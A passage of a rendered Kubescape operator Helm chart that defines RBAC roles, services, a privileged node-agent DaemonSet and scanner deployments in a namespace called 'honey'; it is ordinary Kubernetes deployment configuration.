udproutes + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - namespaces + verbs: + - update +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - workloadconfigurationscans + - workloadconfigurationscansummaries + verbs: + - create + - get + - update + - patch +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - openvulnerabilityexchangecontainers + - sbomsyfts + - sbomsyftfiltereds + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - nodes + - nodes/proxy + - services + - endpoints + - namespaces + - configmaps + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - pods + verbs: + - get + - watch + - list + - delete +- apiGroups: + - '' + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - daemonsets + -
statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - applicationprofiles + - networkneighborhoods + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - seccompprofiles + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + - sbomsyfts + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - create + - patch + - get +- apiGroups: + - kubescape.io + resources: + - rules + verbs: + - list + - watch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - nodes + - namespaces + - configmaps + - services + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - events + verbs: + - create + - patch +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - workloadconfigurationscans + - workloadconfigurationscansummaries + - openvulnerabilityexchangecontainers + - containerprofiles + - sbomsyfts + verbs: + - get + - watch + - list + - delete +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch + - get +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list + - create + - update + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - configurationscansummaries + - vulnerabilitysummaries + verbs: + - get + - watch + - list +--- 
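+# Illustrative only (assumed names, not part of the rendered chart): the
+# summaries granted to prometheus-exporter above are served through the
+# aggregated spdx.softwarecomposition.kubescape.io API registered further
+# down, so a post-install smoke test could be:
+#   kubectl auth can-i list vulnerabilitysummaries.spdx.softwarecomposition.kubescape.io \
+#     --as=system:serviceaccount:honey:prometheus-exporter
+#   kubectl get vulnerabilitysummaries.spdx.softwarecomposition.kubescape.io -A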
+kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - namespaces + - pods + - services + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - daemonsets + - deployments + - replicasets + - statefulsets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - cronjobs + - jobs + verbs: + - get + - watch + - list +- apiGroups: + - flowcontrol.apiserver.k8s.io + resources: + - prioritylevelconfigurations + - flowschemas + verbs: + - get + - watch + - list +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubevuln +subjects: +- kind: ServiceAccount + name: kubevuln + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: node-agent + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: node-agent +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: 
ServiceAccount + name: operator + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: operator +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: prometheus-exporter + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: prometheus-exporter +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage:system:auth-delegator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: system:auth-delegator +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: storage +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - configmaps + - secrets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +- apiGroups: + - batch + resources: + - cronjobs + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: RoleBinding +apiVersion: 
rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: operator +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - name: http + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape +--- +apiVersion: v1 +kind: Service +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln +--- +apiVersion: v1 +kind: Service +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - name: prometheus + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape-admission-webhook + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator 
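+# This Service fronts the operator's admission webhook: port 443 below maps to
+# the operator pod's admission-port (8443), whose certificate pair is mounted
+# from the kubescape-admission-webhook.honey.svc-kubescape-tls-pair secret in
+# the operator Deployment further down. A hedged sanity check after rollout:
+#   kubectl -n honey get endpoints kubescape-admission-webhook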
+ app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + targetPort: 8443 + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + type: ClusterIP +--- +apiVersion: v1 +kind: Service +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 4002 + targetPort: 4002 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator +--- +apiVersion: v1 +kind: Service +metadata: + name: prometheus-exporter + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter +--- +apiVersion: v1 +kind: Service +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + protocol: TCP + targetPort: 8443 + name: https + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + template: + metadata: + annotations: + checksum/node-agent-config: ec2818edfe76e3a71137b1e9c55bd598a3f49c75af64d9f74061e320150c439b + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 +
container.apparmor.security.beta.kubernetes.io/node-agent: unconfined + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: null + priorityClassName: kubescape-critical + serviceAccountName: node-agent + automountServiceAccountToken: true + hostPID: true + volumes: + - hostPath: + path: / + name: host + - hostPath: + path: /var/lib/kubelet + name: kubeletdir + - hostPath: + path: /run + name: run + - hostPath: + path: /var + name: var + - hostPath: + path: /sys/fs/cgroup + name: cgroup + - hostPath: + path: /lib/modules + name: modules + - hostPath: + path: /sys/fs/bpf + name: bpffs + - hostPath: + path: /sys/kernel/debug + name: debugfs + - hostPath: + path: /boot + name: boot + - emptyDir: null + name: data + - emptyDir: null + name: profiles + - emptyDir: {} + name: clamdb + - emptyDir: {} + name: clamrun + - configMap: + items: + - key: clamd.conf + path: clamd.conf + - key: freshclam.conf + path: freshclam.conf + name: clamav + name: etc + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: node-agent + items: + - key: config.json + path: config.json + containers: + - name: node-agent + image: ghcr.io/k8sstormcenter/node-agent:dev-e64d59a + imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: /livez + port: 7888 + initialDelaySeconds: 60 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 7888 + initialDelaySeconds: 3 + periodSeconds: 3 + resources: + limits: + cpu: 500m + memory: 1400Mi + requests: + cpu: 100m + memory: 180Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: HOST_ROOT + value: /host + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: NAMESPACE_NAME + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KUBELET_ROOT + value: /var/lib/kubelet + - name: AGENT_VERSION + value: dev-e64d59a + - name: NodeName + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + privileged: false + capabilities: + add: + - SYS_ADMIN + - SYS_PTRACE + - NET_ADMIN + - SYSLOG + - SYS_RESOURCE + - IPC_LOCK + - NET_RAW + seLinuxOptions: + type: spc_t + volumeMounts: + - mountPath: /host + name: host + readOnly: true + - mountPath: /var/lib/kubelet + name: kubeletdir + - mountPath: /run + name: run + - mountPath: /var + name: var + readOnly: true + - mountPath: /lib/modules + name: modules + readOnly: true + - mountPath: /sys/kernel/debug + name: debugfs + - mountPath: /sys/fs/cgroup + name: cgroup + readOnly: true + - mountPath: /sys/fs/bpf + name: bpffs + - mountPath: /data + name: data + - mountPath: /profiles + name: profiles + - mountPath: /boot + name: boot + readOnly: true + - mountPath: /clamav + name: clamrun + - name: cloud-secret + mountPath: /etc/credentials + 
readOnly: true + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + nodeSelector: + kubernetes.io/os: linux + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/os + operator: In + values: + - linux + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + template: + metadata: + annotations: + checksum/host-scanner-configmap: 0c613e2144b1680df672142a6083c39de89a1c781db9d1a60eb31789966a26ea + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubescape + image: quay.io/kubescape/kubescape:v3.0.47 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: http + containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /livez + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: KS_DOWNLOAD_ARTIFACTS + value: 'true' + - name: RULE_PROCESSING_GOMAXPROCS + value: '' + - name: KS_DEFAULT_CONFIGMAP_NAME + value: kubescape-config + - name: KS_DEFAULT_CONFIGMAP_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KS_CONTEXT + value: bobexample + - name: KS_DEFAULT_CLOUD_CONFIGMAP_NAME + value: ks-cloud-config + - name: KS_ENABLE_HOST_SCANNER + value: 'true' + - name: KS_SKIP_UPDATE_CHECK + value: 'false' + - name: KS_HOST_SCAN_YAML + value: /home/nonroot/.kubescape/host-scanner.yaml + - name: LARGE_CLUSTER_SIZE + value: '1500' + - name: KS_EXCLUDE_NAMESPACES + value: 
kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse + command: + - ksserver + resources: + limits: + cpu: 600m + memory: 1Gi + requests: + cpu: 250m + memory: 400Mi + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: kubescape-volume + mountPath: /home/nonroot/.kubescape + subPath: config.json + - name: host-scanner-definition + mountPath: /home/nonroot/.kubescape/host-scanner.yaml + subPath: host-scanner-yaml + - name: results + mountPath: /home/nonroot/results + - name: failed + mountPath: /home/nonroot/failed + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: host-scanner-definition + configMap: + name: host-scanner-definition + - name: kubescape-volume + emptyDir: {} + - name: results + emptyDir: {} + - name: failed + emptyDir: {} + serviceAccountName: kubescape + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + template: + metadata: + annotations: + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubevuln + image: quay.io/kubescape/kubevuln:v0.3.98 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: 8080 + resources: + limits: + cpu: 1500m + ephemeral-storage: 10Gi + memory: 5000Mi + requests: + cpu: 300m + ephemeral-storage: 5Gi + memory: 1000Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: 
